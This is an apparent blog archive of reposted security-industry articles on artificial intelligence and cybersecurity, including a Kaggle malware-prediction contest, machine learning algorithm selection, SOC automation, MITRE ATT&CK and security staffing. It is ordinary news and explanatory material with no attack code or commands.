Category Archives: artificial intelligence

Microsoft AI competition explores the next evolution of predictive technologies in security

Predictive technologies are already effective at detecting and blocking malware at first sight. A new malware prediction competition on Kaggle will challenge the data science community to push these technologies even furtherto stop malware before it is even seen.

The Microsoft-sponsored competition calls for participants to predict if a device is likely to encounter malware given the current machine state. Participants will build models using 9.4GB of anonymized data from 16.8M devices, and the resulting models will be scored by their ability to make correct predictions. Winning teams get $25,000 in total prizes.

The competition provides academics and researchers with varied backgrounds a fresh opportunity to work on a real-world problem using a fresh set of data from Microsoft. Results from the contest will help us identify opportunities to further improve Microsofts layered defenses, focusing on preventative protection. Not all machines are equally likely to get malware; competitors will help build models for identifying devices that have a higher risk of getting malware so that preemptive action can be taken.

Cybersecurity is the central challenge of our digital age. Today, Windows Defender Advanced Threat Protection (Windows Defender ATP) uses intelligent systems to protect millions of devices against cyberattacks every day. Machine learning and artificial intelligence drive cloud-delivered protections that catch and predict new and emerging threats.

We also believe in the power of working with the broader research community to stay ahead of threats. Microsofts 2015 malware classification competition on Kaggle was a huge success, with the dataset provided by Microsoft cited in more than 50 research papers in multiple languages. To this day, the 0.5TB dataset from that competition is still used for research and continues to produce value for Microsoft and the data science community. This new competition is organized by the Windows Defender ATP Research team, in cooperation with Northeastern University and Georgia Institute of Technology as academic partners, with the goal of bringing new ideas to the fight against malware attacks and breaches.

Kaggle is a platform for data scientists to create data science projects, download datasets, and participate in contests. Microsoft is happy to use the Kaggle platform to engage a rich community of amazing thinkers. We think this collaboration will result in better protection for Microsoft customers and the Internet at large. Stay tuned for the results, we cant wait to see what the data science community comes up with!

Click here to join the competition.

 

 

Chase Thomas and Robert McCann
Windows Defender Research team

 

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Microsoft AI competition explores the next evolution of predictive technologies in security appeared first on Microsoft Secure.

AI Set to Supercharge Phishing in 2019

The coming year will see a mix of old and new as phishing is supercharged with AI but reported vulnerabilities continue to cause organizations problems, according to Trend Micro. The security

The post AI Set to Supercharge Phishing in 2019 appeared first on The Cyber Security Place.

Leveraging AI and automation for successful DevSecOps

As engineering teams try to innovate at a faster pace, being able to maintain the quality, performance and security of the applications become much more important. Organizations have found huge success in improving their overall product quality while ensuring security controls and compliance requirements are met. AI-driven automation solutions have aided engineering teams in automating key processes and leverage predictive analytics, to identify issues before they occur and taking corrective actions, improving the overall product … More

The post Leveraging AI and automation for successful DevSecOps appeared first on Help Net Security.

Continuous Compliance Eases Cloud Adoption for Financial Services Firms

Last month, I spoke during the Innovation Showcase at the Financial Services Information Sharing and Analysis Center (FS-ISAC) Fall Summit. The goal was to update this group of high-level security professionals on a continuous compliance managed services solution that helps solve the cloud compliance dilemma — and on the solution’s first successful implementation. In a consortium of more than 30 financial services firms building an industry-standard cloud control framework, almost all reported regulatory compliance as a major hurdle to cloud adoption.

Overcome the Challenges of Cloud Compliance

Financial institutions are eager to use the hybrid cloud as a productive workplace to achieve strategic goals. But as reported in our white paper, “Turning Regulatory Challenges of the Cloud Into Competitive Advantage,” firms must overcome three major cloud adoption challenges.

First, companies face different regulatory obligations in various geographies. Multinational organizations must map regulatory obligations to 26 different countries and jurisdictions as far-flung as Singapore, London and New York.

Second, cloud service providers (CSPs) often provide different levels of control in the cloud than in the data center. That leaves financial services firms to build the right controls to address how they store and use data and who can access it — wherever it is. Regulators express concern over the amount of sensitive information CSPs maintain, often without being subject to the stringent regulations that govern banks, according to Business Insider.

Third, financial services firms and CSPs need a common security framework. A major accomplishment was reaching a consensus among the consortium members on the Cloud Security Alliance (CSA) open source framework. Modifications make it possible to build a single framework that is fully integrated with risk management and cybersecurity controls.

Lay the Groundwork for Continuous Compliance

Our managed services solution helps answer these challenges with continuous compliance to meet requirements for workloads running on public clouds — not only for regulations impacting the cloud, but for the General Data Protection Regulation (GDPR), Financial Industry Regulatory Authority (FINRA), U.S. Securities and Exchange Commission (SEC) and other regulatory bodies. The solution was developed in three stages.

1. Build a Regulatory Database for All Geographies

A continuous compliance database maps to every regulatory authority around the world. The database also defines GDPR and other cybersecurity obligations. The service monitors changes and makes timely updates to an industry-standard cloud control framework and regulatory database.

2. Map All of the Regulations and Controls to Each CSP

Mapping to CSPs is critical to achieve a standard level of control and to meet or exceed controls financial services firms might use within their own firewalls. Our solution maps a standard set of controls to every CSP, whether it’s Amazon, Google, Microsoft or IBM.

3. Adapt the Solution to the Individual Financial Services Firm

Each financial services firm already maintains in-house controls. The managed services solution requires an adapter to map the standardized framework to the existing framework for each firm’s individual policies, standards and procedures.

Continuous Compliance in Action

One of the largest investment firms in the world recently implemented the continuous compliance managed services solution with impressive success. A team of back-office personnel previously spent each day combing the internet for new and changing legislation and determining the impacts on current controls. The employees made updates manually.

The work was painstaking, tedious, and labor- and time-intensive, but these compliance employees formed the firm’s frontline defense against regulatory risk. Our managed services solution will help enable the firm to reduce its staff while saving substantially on compliance and reducing the risk of regulatory fines and reputational damage.

Automate Compliance With Cognitive Computing

Compliance is not a one-time event, but rather an ongoing process of monitoring and maintaining. Automation and cognitive computing — including artificial intelligence (AI) and machine learning — are the engines behind better, more efficient cloud governance.

In the future, the continuous compliance service will use Watson for RegTech. Watson will initially ingest existing regulations. Then, Watson will not only identify changes and update regulations, but also revise the controls that correspond with each regulation. Once Watson is fully trained, the time to add a new regulation or update an existing one will shrink exponentially.

Transfer to Other Obligations, Technologies and Domains

Financial services firms ultimately need to be in complete, real-time alignment with their regulatory obligations worldwide. Firms can access the industry-standard database to consume and adapt to updates for policies, requirements and controls while still maintaining their own firm-specific controls and processes. Our managed services solution mainly covers financial services regulations for cloud computing. Going forward, look for the scope to extend to regulations covering myriad technologies and domains to help financial institutions of all stripes overcome their greater cloud adoption challenges.

Read the white paper: Turning the regulatory challenges of cloud into competitive advantage

The post Continuous Compliance Eases Cloud Adoption for Financial Services Firms appeared first on Security Intelligence.

Artificial Intelligence and Cybersecurity: Attacking and Defending

Cybersecurity is a manpower constrained market – therefore, the opportunities for artificial intelligence (AI) automation are vast. Frequently, AI is used to make certain defensive aspects of cyber security more wide reaching and effective. Combating spam and detecting malware are prime examples. On the opposite side, there are many incentives to use AI when attempting […]… Read More

The post Artificial Intelligence and Cybersecurity: Attacking and Defending appeared first on The State of Security.

The State of Security: Artificial Intelligence and Cybersecurity: Attacking and Defending

Cybersecurity is a manpower constrained market – therefore, the opportunities for artificial intelligence (AI) automation are vast. Frequently, AI is used to make certain defensive aspects of cyber security more wide reaching and effective. Combating spam and detecting malware are prime examples. On the opposite side, there are many incentives to use AI when attempting […]… Read More

The post Artificial Intelligence and Cybersecurity: Attacking and Defending appeared first on The State of Security.



The State of Security

10 trends impacting infrastructure and operations for 2019

Gartner highlighted the key technologies and trends that infrastructure and operations (I&O) leaders must start preparing for to support digital infrastructure in 2019. “More than ever, I&O is becoming increasingly involved in unprecedented areas of the modern day enterprise. The focus of I&O leaders is no longer to solely deliver engineering and operations, but instead deliver products and services that support and enable an organization’s business strategy,” said Ross Winser, Senior Director, Analyst at Gartner. … More

The post 10 trends impacting infrastructure and operations for 2019 appeared first on Help Net Security.

Machine Learning Algorithms Are Not One-Size-Fits-All

This is the second installment in a three-part series about machine learning. Be sure to read part one for the full story.

When designing machine learning solutions for security, it’s important to decide on a classifier that will perform the best with minimal error. Given the sheer number of choices available, it’s easy to get confused. Let’s explore some tips to help security leaders select the right machine learning algorithm for their needs.

4 Types of Machine Learning Techniques

If you know which category your problem falls into, you can narrow down your choices. Machine learning algorithms are broadly categorized under four types of learning problems.

1. Supervised Learning

Supervised learning trains the algorithm based on example sets of input/output pairs. The goal is to develop new inferences based on patterns inferred from the sample results. Sample data must be available and labeled. For example, designing a spam detector model by learning from samples of labeled spam/nonspam is supervised learning. Another example is a problem such as the Defense Advanced Research Projects Agency (DARPA)’s Knowledge Discovery and Data Mining 1999 challenge (KDD-99), in which contestants competed to design a machine learning-based intrusion detection system (IDS) from a set of 41 features per instance labeled either “attack” or “normal.”

2. Unsupervised Learning

Unsupervised learning uses data that has not been labeled, classified or categorized. The machine is challenged to identify patterns through processes such as clustering, and the outcome is usually unknown. Clustering is a task in which samples are compared with each other in an attempt to find examples that are close to each other, usually by either a measure of density or a distance metric, such as Euclidian distance when projected into a high-dimensional space.

A security problem that falls into this category is network anomaly detection, which is a different method of designing an IDS. In this case, the algorithm doesn’t assume that it knows an attack from a normal input. Instead, the algorithm tries to understand what normal traffic is by watching the network in a (hopefully) clean state so that it can learn the patterns of traffic. Then, anything that falls outside of this “normal” region is a possible attack. Note that there is a great deal of uncertainty with these algorithms because they do not actually know what an attack looks like.

3. Semisupervised Learning

This type of learning uses a combination of labeled and unlabeled data, typically with the majority being unlabeled. It is primarily used to provide some concept of a known classification to unsupervised algorithms. Several techniques, such as label spreading and weakly supervised learning, can also be employed to augment a supervised training set with a small number of samples. This requires a great deal of work because it is an extremely common scenario.

For the challenge of exploit kit identification, for example, we can find some known exploit kits to train our model, but there are many variants and unknown kits that can’t be labeled. Semisupervised learning can help solve this problem. Note that semisupervised and fully supervised learning can often be differentiated by the choice of features to learn against. Depending on the features, you can often label much more data than you can with another selected set of features.

4. Reinforcement Learning

Unlike the other three types of learning problems, reinforcement learning seeks the optimal path to a desired result by rewarding improvement. The problem set is generally small and the training data well-understood. An example is a generative adversarial network (GAN) such as this experiment, in which the distance, measured in correct and incorrect bits, was used as a loss function to encrypt messages between two neural networks.

Another example is PassGAN, where a GAN was trained to guess passwords more efficiently and the reinforcement function, at a very high level, was how many passwords it guessed correctly. Specifically, PassGAN learned rules to take a dictionary and create likely passwords based on an actual set of leaked passwords. It modeled human behavior in guessing the ways that humans transformed passwords into nondictionary character strings.

Problem Type and Training Data

Another, broader categorization of algorithm is based on the type of problem, such as classification, regression, anomaly detection or dimensionality reduction. There are specific machine learning algorithms designed for each type of problem.

Once you have narrowed down your choices based on the above broader categories, you should consider the algorithm’s bias or variance.

Bias is defined in practical effect as the ability of an algorithm to model the training data accurately. Bias represents the proximity of the model to the training data. A high bias results in the model missing relationships between features and the target variable, which leads to what is known as underfitting.

Variance is how accurately the model measures noise in the distribution of training samples. A high variance means that random variables are captured more effectively. Obviously, we do not want this either. Therefore, we seek to minimize both of these values. We can control bias and variance through different parameters. For example, the k-means algorithm with a high value of k gives us high bias and low variance. This makes sense because the value of k means that we have allowed more clusters in space to form, and more of the relationships among the features will be missed as the algorithm fits the data to a larger number of clusters.

A deeper decision tree has more variance because it contains more branches (decision points) and therefore has more false relationships that model noise in the training data. For artificial neural networks (ANNs), variance increases and bias decreases with the increase in the number of layers. Therefore, deep learning has a very low bias. However, this is at the cost of more noise being represented in the deep learning models.

Other Considerations for Selecting Machine Learning Algorithms

Data type also dictates the choice of algorithm because some algorithms work better on certain data types than others. For example, support vector machines (SVMs), linear and logistic regression, and neural networks require the feature vector to be numerical. On the other hand, decision trees can be more flexible to different data types, such as nominal input.

Some algorithms perform poorly when there is correlation between the features — meaning that multiple features demonstrate the same patterns. A feature that is defined as the result of calculations based on other features would be highly correlated with those input features. Linear regression and logistic regression, along with other algorithms, require regularization to avoid numerical instabilities that come from redundancy in data.

The relationship between independent and dependent variables can also help us determine which algorithm to choose. Because naive Bayes, linear regression and logistic regression perform well if each feature has an independent contribution to the output, these algorithms are poor choices for correlated data. Unfortunately, when features are extracted from voluminous data, it is often impossible to know whether the independence assumption holds true without further analysis. If the relationship is more complex, decision trees or neural networks may be a better choice.

Noise in the output values can also inform which algorithm to choose, as well as the parameters for your selected algorithm. However, you are best served by cleaning the data of noise. If you can’t clean the data, you will most likely receive results with poor classification boundaries. An SVM, for example, is very sensitive to noise because it attempts to draw a margin, or boundary, between or among the classes of the data as they are labeled. A decision tree or bagged tree such as a random forest might be a better choice here since these allow for the tree(s) to be pruned. A shallower tree models less noise.

Dimensionality of the input space is critical to your decision as well. In dimensionality, there are two common phenomena that are directly at odds with each other. First, the so-called curse of dimensionality occurs when the data contains a very large number of features. If you think about this in special terms, a two-dimensional figure verses a three-dimensional figure can look very different. A very packed set of points on a plane can become spread apart once we add the third dimension. If we try to cluster these points, the distances between two arbitrary points will dramatically increase.

Alternatively, the blessing of dimensionality means that having more dimensions helps us model the problem more completely. In this sense, the plane may pack completely unrelated points together because the two-dimensional coordinates are close to each other even though they have nothing to do with each other. In three dimensions, these points might be spread farther apart, showing us a more complete separation of the unrelated points.

These two ideas cause us, as domain experts and deep learning designers, to pick our features carefully. We do not want to encounter the sparsity of the curse of dimensionality because there might not be a clear boundary, but we also do not want to pack our unrelated examples too close to each other and create an unusable boundary. Some algorithms work better in higher dimensions. In very high dimensional space, for example, you might choose a boosted random forest or a deep learning model.

Transparency and Functional Complexity

The level of visibility into the model’s decision process is a very important criterion for selecting an algorithm. Algorithms that provide decision trees show clearly how the model reached a decision, whereas a neural network is essentially a black box.

Similarly, you should consider functional complexity and the amount of training data. Functional complexity can be understood in terms of things like speed and memory usage. If you lack sufficient computational power or memory in the machine on which your model will be run, you should choose an algorithm such as naive Bayes or one of the many rules generator-based algorithms. Naive Bayes counts the frequencies of terms, so its model is only as big as the number of features in the data. Rules generators essentially create a series of if/then conditions that the data must satisfy to be classified correctly. These are very good for low-complexity devices. If, however, you have a good deal of power and memory, you might go so far as deep learning, which (in most but not all configurations) requires many more resources.

How Much Training Data Do You Need?

You might also opt for naive Bayes if you have a smaller set of training data available. A small training data size will severely limit you, so it is always best to acquire as much data as you can. A few hundred might be able to construct a shallow decision tree or a naive Bayesian model. A few thousand to tens of thousands is usually enough to create an effective random forest, an algorithm that performs very well in most learning problems. Finally, if you want to try deep learning, you may need hundreds of thousands — or, preferably, millions — of training examples, depending on how many layers you want your deep learning model to have.

Try Several Classifiers and Pick the Best

When all else fails, try several classifiers that are suitable for your problem and then compare the results. Key metrics include accuracy of the model and true and false positive rates; derived metrics such as precision, recall and F1; and even metrics as complex as area under the receiver operating characteristic curve (AUC) and area under the precision-recall curve (AUPRC). Each measurement tells you something different about the model’s performance. We’ll define these metrics in greater detail in the final installment of our three-part series.

The post Machine Learning Algorithms Are Not One-Size-Fits-All appeared first on Security Intelligence.

Researchers create AI that could spell the end for website security captchas

Researchers have created new artificial intelligence that could spell the end for one of the most widely used website security systems. The new algorithm, based on deep learning methods, is the most effective solver of captcha security and authentication systems to date and is able to defeat versions of text captcha schemes used to defend the majority of the world’s most popular websites. Text-based captchas use a jumble of letters and numbers, along with other … More

The post Researchers create AI that could spell the end for website security captchas appeared first on Help Net Security.

New ‘Under the Radar’ report examines modern threats and future technologies

As if you haven’t heard it enough from us, the threat landscape is changing. It’s always changing, and usually not for the better.

The new malware we see being developed and deployed in the wild have features and techniques that allow them to go beyond what they were originally able to do, either for the purpose of additional infection or evasion of detection.

To that end, we decided to take a look at a few of these threats and pick apart what about them makes them difficult to detect, remaining just out of sight and able to silently spread across an organization.

 Download: Under the Radar: The Future of Undetected Malware

We then examine what technologies are unprepared for these threats, which modern tech is actually effective against these new threats, and finally, where the evolution of these threats might eventually lead.

The threats we discuss:

  • Emotet
  • TrickBot
  • Sorebrect
  • SamSam
  • PowerShell, as an attack vector

While discussing these threats, we also look at where they are most commonly found in the US, APAC, and EMEA regions.

Emotet 2018 detections in the United States

Emotet 2018 detections in the United States

In doing so, we discovered interesting trends that create new questions, some of which are clear and others that need more digging. Regardless, it is evident that these threats are not old hat, but rather making bigger and bigger splashes as the year goes on, in interesting and sometimes unexpected ways.

Sorebrect ransomware detections in APAC regionSorebrect ransomware detections in APAC region

Though the spread and capabilities of future threats are unknown, we have to prepare people to protect their data and experiences online. Unfortunately, many older security solutions will not be able to combat future threats, let alone what is out there now.

Not all is bad news in security, though, as we do have a lot going for us as in technological developments and innovations in modern features. For example:

  • Behavioral detection
  • Blocking at delivery
  • Self-defense modes

These features are effective at combating today’s threats and will soon be needed to build the basis for future developments, such as:

  • Artificial Intelligence being used to develop, distribute, or control malware
  • The continued development of fileless and “invisible” malware
  • Businesses becoming worm food for future malware

Download: Under the Radar: The Future of Undetected Malware

The post New ‘Under the Radar’ report examines modern threats and future technologies appeared first on Malwarebytes Labs.

How Can Government Security Teams Overcome Obstacles in IT Automation Deployment?

IT automation has become an increasingly critical tool used by enterprises around the world to strengthen their security posture and mitigate the cybersecurity skills shortage. But most organizations don’t know how, when or where to automate effectively, as noted in a recent report by Juniper Networks and the Ponemon Institute.

According to “The Challenge of Building the Right Security Automation Architecture,” only 35 percent of organizations have employees on hand who are experienced enough to respond to threats using automation. The majority of organizations (71 percent) ranked integrating disparate security technologies as the primary obstacle they have yet to overcome as they work toward an effective security automation architecture.

The report pointed out that the U.S. government is likely to struggle with IT automation as well, but there is much that it can learn from the private sector to help streamline the process.

How Hard Can IT Automation Be?

According to the study’s findings, enterprises are struggling to implement automation tools because of the lack of expertise currently available.

Juniper’s head of threat research, Mounir Hahad, and its head of federal strategy, David Mihelcic, said the U.S. government will “definitely struggle with automation as much, if not more than the private sector.”

About half (54 percent) of the survey’s respondents reported that detecting and responding to threats is made easier with automation technologies. Of the 1,859 IT and IT security practitioners in the U.S., the U.K., Germany and France, 64 percent found a correlation between automation and the increased productivity of security personnel.

Be Cautiously Optimistic

Indeed, there is good news for government security teams. Technology Modernization Fund (TMF) awards are now available as an initiative of the Modernizing Government Technology Act (MGT). The Departments of Energy, Agriculture, and Housing and Urban Development were the first three agencies to receive a combined total of $45 million in TMFs, according to FedScoop.

More government agencies will likely apply for some of the $55 million that remains available for 2018. While there’s a strong likelihood that agencies will continue to invest in automation with some portion of these funds, Juniper Networks warned that they shouldn’t expect an easy deployment.

“The cybercrime landscape is incredibly vast, organized and automated — cybercriminals have deep pockets and no rules, so they set the bar,” said Amy James, director of security portfolio marketing at Juniper Networks, in a press release. “Organizations need to level the playing field. You simply cannot have manual security solutions and expect to successfully battle cybercriminals, much less get ahead of their next moves. Automation is crucial.”

Why Automate?

With so many IT teams unable to recruit sufficient talent to implement automation tools, David “Moose” Wolpoff, chief technology officer (CTO) and co-founder of Randori, questioned why organizations are considering them as part of their security infrastructure in the first place.

“Based on [Juniper’s] findings, I get the impression that government entities may be feeling the same way, buying a bunch of automation tools without knowing quite how or why they are going to use them,” Wolpoff said.

Organizations that dive headfirst into implementing automation, whether government entities or not, will likely run into problems if they fail to plan with business objectives in mind.

“Automation isn’t a solution, it’s a force-multiplier,” explained Wolpoff. “If it’s not enabling your objectives, then you’re just adding a useless tool to your toolbox. My advice to government security teams planning to implement automation would be to sit down with leadership to discuss not only what you want to gain from automation, but where automation makes sense and what it will take to successfully implement.”

Three Tips to Deploy Automation Thoughtfully

Given the need for interoperability within and across the sundry components of different agencies, many conversations about automation will likely result in a green light for implementation. If that’s the case, Hahad offered these three steps security teams can take to overcome IT obstacles.

1. Start With Basic Tasks

Security teams should start by automating administrative tasks before implementing more advanced processes such as event-driven automation once IT departments gain experience.

Too often, organizations bite off more than they can chew when it comes to implementing automation tools, by either misdeploying them or deploying more than they can fully take advantage of. This will only further complicate processes.

2. Collaborate Across Agencies

Replacing legacy systems and deploying automation tools will require much closer collaboration across teams and agencies to identify which framework and architecture they should adopt. A lack of coordination will result in a patchwork of architectures, vendors and tools, which could produce significant gaps and redundancies.

3. Fully Embrace Automation

IT teams are traditionally hesitant to remove the human element from processes, fearing the system will block something critical and cause more problems. If an agency invests in automating its security tools, it should automate across the security processes — from detection and alerting to incident response. The more tasks automation can manage, the more teams will be empowered to complete higher-level work.

It’s important to identify the additional capabilities that don’t require a lot of heavy lifting but will result in saving both time and money. You can avoid unnecessary additional costs that will delay deployment by talking with other agencies that have gone through a similar process.

Depending on how deeply automated those organizations are, it may be appropriate to share experiences to streamline deployments. In the end, streamlining and simplifying programs for every team is the ultimate goal of automation.

The post How Can Government Security Teams Overcome Obstacles in IT Automation Deployment? appeared first on Security Intelligence.

SNDBOX: AI-Powered Online Automated Malware Analysis Platform

Looking for an automated malware analysis software? Something like a 1-click solution that doesn't require any installation or configuration…a platform that can scale up your research time… technology that can provide data-driven explanations… well, your search is over! Israeli cybersecurity and malware researchers today at Black Hat conference launch a revolutionary machine learning and

Fight Evolving Cybersecurity Threats With a One-Two-Three Punch

When I became vice president and general manager for IBM Security North America, the staff gave me an eye-opening look at the malicious hackers who are infiltrating everything from enterprises to government agencies to political parties. The number of new cybersecurity threats is distressing, doubling from four to eight new malware samples per second between the third and fourth quarters of 2017, according to McAfee Labs.

Yet that inside view only increased my desire to help security professionals fulfill their mission of securing organizations against cyberattacks through client and industry partnerships, advanced technologies such as artificial intelligence (AI), and incident response (IR) training on the cyber range.

Cybersecurity Is Shifting From Prevention to Remediation

Today, the volume of threats is so overwhelming that getting ahead is often unrealistic. It’s not a matter of if you’ll have a breach, it’s a matter of when — and how quickly you can detect and resolve it to minimize damage. With chief information security officers (CISOs) facing a shortage of individuals with the necessary skills to design environments and fend off threats, the focus has shifted from prevention to remediation.

To identify the areas of highest risk, just follow the money to financial institutions, retailers and government entities. Developed countries also face greater risks. The U.S. may have advanced cybersecurity technology, for example, but we also have assets that translate into greater payoffs for attackers.

Remediation comes down to visibility into your environment that allows you to notice not only external threats, but internal ones as well. In fact, internal threats create arguably the greatest vulnerabilities. Users on the inside know where the networks, databases and critical information are, and often have access to areas that are seldom monitored.

Bring the Power of Partnerships to Bear

Once you identify a breach, you’ll typically have minutes or even seconds to quarantine it and remediate the damage. You need to be able to leverage the data available and make immediate decisions. Yet frequently, the tools that security professionals use aren’t appropriately implemented, managed, monitored or tuned. In fact, 44 percent of organizations lack an overall information security strategy, according to PwC’s “The Global State of Information Security Survey 2018.”

Organizations are beginning to recognize that they cannot manage cybersecurity threats alone. You need a partner that can aggregate data from multiple clients and make that information accessible to everyone, from customers to competitors, to help prevent breaches. It’s like the railroad industry: Union Pacific, BNSF and CSX may battle for business, but they all have a vested interest in keeping the tracks safe, no matter who is using them.

Harden the Expanding Attack Surface

Along with trying to counteract increasingly sophisticated threats, enterprises must also learn how to manage the data coming from a burgeoning number of Internet of Things (IoT) devices. This data improves our lives, but the devices give attackers even more access points into the corporate environment. That’s where technology that manages a full spectrum of challenges comes into play. IBM provides an immune system for security from threat intelligence to endpoint management, with a host of solutions that harden your organization.

Even with advanced tools, analysts don’t always have enough hours in the day to keep the enterprise secure. One solution is incorporating automation and AI into the security operations center (SOC). We layer IBM Watson on top of our cybersecurity solutions to analyze data and make recommendations. And as beneficial as AI might be on day one, it delivers even more value as it learns from your data. With increasing threats and fewer resources, any automation you can implement in your cybersecurity environment helps get the work done faster and smarter.

Make Incident Response Like Muscle Memory

I mentioned malicious insider threats, but users who don’t know their behavior creates vulnerabilities are equally dangerous — even if they have no ill intent. At IBM, for example, we no longer allow the use of thumb drives since they’re an easy way to compromise an organization. We also train users from myriad organizations on how to react to threats, such as phishing scams or bogus links, so that their automatic reaction is the right reaction.

This is even more critical for incident response. We practice with clients just like you’d practice a golf swing. By developing that muscle memory, it becomes second nature to respond in the appropriate way. If you’ve had a breach in which the personally identifiable information (PII) of 100,000 customers is at risk — and the attackers are demanding payment — what do you say? What do you do? Just like fire drills, you must practice your IR plan.

Additionally, security teams need training to build discipline and processes, react appropriately and avoid making mistakes that could cost the organization millions of dollars. Response is not just a cybersecurity task, but a companywide communications effort. Everyone needs to train regularly to know how to respond.

Check out the IBM X-Force Command Cyber Tactical Operations Center (C-TOC)

Fighting Cybersecurity Threats Alongside You

IBM considers cybersecurity a strategic imperative and, as such, has invested extensive money and time in developing a best-of-breed security portfolio. I’m grateful for the opportunity to put it to work to make the cyber world a safer place. As the leader of the North American security unit, I’m committed to helping you secure your environments and achieve better business outcomes.

The post Fight Evolving Cybersecurity Threats With a One-Two-Three Punch appeared first on Security Intelligence.

Manipulating Digital Mammograms Via Artificial Intelligence May Cause Misdiagnosis

Mammography has been a critical procedure for diagnosing breast cancer. Yet, at the same time, the exposure to radiations has

Manipulating Digital Mammograms Via Artificial Intelligence May Cause Misdiagnosis on Latest Hacking News.

AI in cyber security: a help or a hindrance?

AI has the possibility of being deployed by both sides: those looking to attack and those looking to defend.With a disappearing IT perimeter, a widening skills gap and the increasing sophistication

The post AI in cyber security: a help or a hindrance? appeared first on The Cyber Security Place.

Is Your SOC Overwhelmed? Artificial Intelligence and MITRE ATT&CK Can Help Lighten the Load

Whether you have a security team of two or 100, your goal is to ensure that the business thrives. That means protecting critical systems, users and data, detecting and responding to threats, and staying one step ahead of cybercrime.

However, security teams today are faced with myriad challenges, such as fragmented threat data, an overabundance of poorly integrated point solutions and lengthy dwell times — not to mention an overwhelming volume of threat intelligence and a dearth of qualified talent to analyze it.

With the average cost of a data breach as high as $3.86 million, up 6.4 percent from 2017, security leaders need solutions and strategies that deliver demonstrable value to their business. But without a comprehensive framework by which to implement these technologies, even the most advanced tools will have little effect on the organization’s overall security posture. How can security teams lighten the load on their analysts while maximizing the value of their technology investments?

Introducing the MITRE ATT&CK Framework

The MITRE Corporation maintains several common cybersecurity industry standards, including Common Vulnerabilities and Exposures (CVE) and Common Weakness Enumeration (CWE). MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.

A cyber kill chain describes the various stages of a cyberattack as it pertains to network security. The actual framework, called the Cyber Kill Chain, was developed by Lockheed Martin to help organizations identify and prevent cyber intrusions.

The steps in a kill chain trace the typical stages of an attack from early reconnaissance to completion. Analysts use the chain to detect and prevent advanced persistent threats (APT).

Cyber Kill Chain

The MITRE ATT&CK builds on the Cyber Kill Chain, provides a deeper level of granularity and is behavior-centric.

MITRE Modified Cyber Kill Chain

Benefits of adopting the MITRE ATT&CK framework in your security operations center (SOC) include:

  • Helping security analysts understand adversary behavior by identifying tactics and techniques;

  • Guiding threat hunting and helping prioritize investigations based on tactics used;

  • Helping determine the coverage and detection capability (or lack thereof); and

  • Determining the overall impact using adversaries’ behaviors.

How Artificial Intelligence Brings the ATT&CK Framework to Life

To unlock the full range of benefits, organizations should adopt artificial intelligence (AI) solutions alongside the ATT&CK framework. This confluence enables security leaders to automate incident analysis, thereby force-multiplying the team’s efforts and enabling analysts to focus on the most important tasks in an investigation.

Artificial intelligence solutions can also help security teams drive more consistent and deeper investigations. Whether it’s 4:30 p.m. on a Friday or 10 a.m. on a Monday, your investigations should be equally thorough each and every time.

Finally, using advanced AI tools, such as the newly released QRadar Advisor with Watson 2.0, in the context of the ATT&CK framework can help organizations reduce dwell times with a quicker and more decisive escalation process. Security teams can determine root cause analysis and drive next steps with confidence by mapping the attack to their dynamic playbook.

Learn how QRadar Advisor with Watson 2.0 embraces the MITRE ATT&CK framework

The post Is Your SOC Overwhelmed? Artificial Intelligence and MITRE ATT&CK Can Help Lighten the Load appeared first on Security Intelligence.

CIPL Publishes Report on Artificial Intelligence and Data Protection in Tension

The Centre for Information Policy Leadership (“CIPL”) at Hunton Andrews Kurth LLP recently published the first report in its project on Artificial Intelligence (“AI”) and Data Protection: Delivering Sustainable AI Accountability in Practice.

The report, entitled “Artificial Intelligence and Data Protection in Tension,” aims to describe in clear, understandable terms:

  • what AI is and how it is being used all around us today;
  • the role that personal data plays in the development, deployment and oversight of AI; and
  • the opportunities and challenges presented by AI to data protection laws and norms.

The report describes AI capabilities and examples of public and private uses of AI applications in society. It also looks closely at various tensions that exist between well-established data protection principles and the requirements of AI technologies.

The report concludes with six general observations:

  • Not all AI is the same;
  • AI is widely used in society today and is of significant economic and societal value;
  • AI requires substantial amounts of data to perform optimally;
  • AI requires data to identify and guard against bias;
  • The role of human oversight of AI is likely to and will need to change for AI to deliver the greatest benefit to humankind; and
  • AI challenges some requirements of data protection law.

The report is a level-setting backdrop for the next phase of CIPL’s AI project – working with data protection officials, industry leaders and others to identify practical ways of addressing challenges and harnessing the opportunities presented by AI and data protection.

After this next phase, CIPL expects to release a second report, Delivering Sustainable AI Accountability in Practice, which will address some of the critical tools that companies and organizations are starting to develop and implement to promote accountability for their use of AI within existing legal and ethical frameworks, as well as reasonable interpretations of existing principles and laws that regulators can employ to achieve efficient, effective privacy protection in the AI context. The report will also touch on considerations for the developing data protection laws cognizant of AI and other innovative technologies.

To read the first report in detail and to learn more about the observations detailed above, please see the full report.

Center for Connected Medicine Polls Top Health Systems About 2019 Priorities

Cybersecurity is still the big one. But interoperability and telehealth are not far behind for leading organizations’ technology goals. The Center for Connected Medicine polled IT executives across 38 health

The post Center for Connected Medicine Polls Top Health Systems About 2019 Priorities appeared first on The Cyber Security Place.

Soft Skills, Solid Benefits: Cybersecurity Staffing Shifts Gears to Bring in New Skill Sets

With millions of unfilled cybersecurity jobs and security experts in high demand, chief information security officers (CISOs) are starting to think outside the box to bridge the skills gap. Already, initiatives such as outsourced support and systems automation are making inroads to reduce IT stress and improve efficiency — but they’re not enough to drive long-term success.

Enter the next frontier for forward-thinking technology executives: Soft skills.

How Important Are Soft Skills in the Enterprise?

Soft skills stem from personality traits and characteristics. Common examples include excellent communication, above-average empathy and the ability to demystify tech jargon, as opposed to the certifications and degrees associated with traditional IT skills.

Historically, IT organizations have prioritized harder skills over their softer counterparts — what good is empathy in solving storage problems or improving server uptime? However, as noted by Forbes, recent Google data revealed measurable benefits when teams contain a mix of hard and soft skills. The search giant found that the “highest-performing teams were interdisciplinary groups that benefited heavily from employees who brought strong soft skills to the collaborative process.”

How Can Companies Quantify Qualitative Skill Sets?

Soft skills drive value, but how can organizations quantify qualitative characteristics? Which skill sets offer the greatest value for corporate objectives?

When it comes to prioritization, your mileage may vary; depending on the nature and complexity of IT projects, different skills provide different value. For example, long-term projects that require cross-departmental collaboration could benefit from highly communicative IT experts, while quick-turnaround mobile application developments may require creative thinking to identify potential security weaknesses.

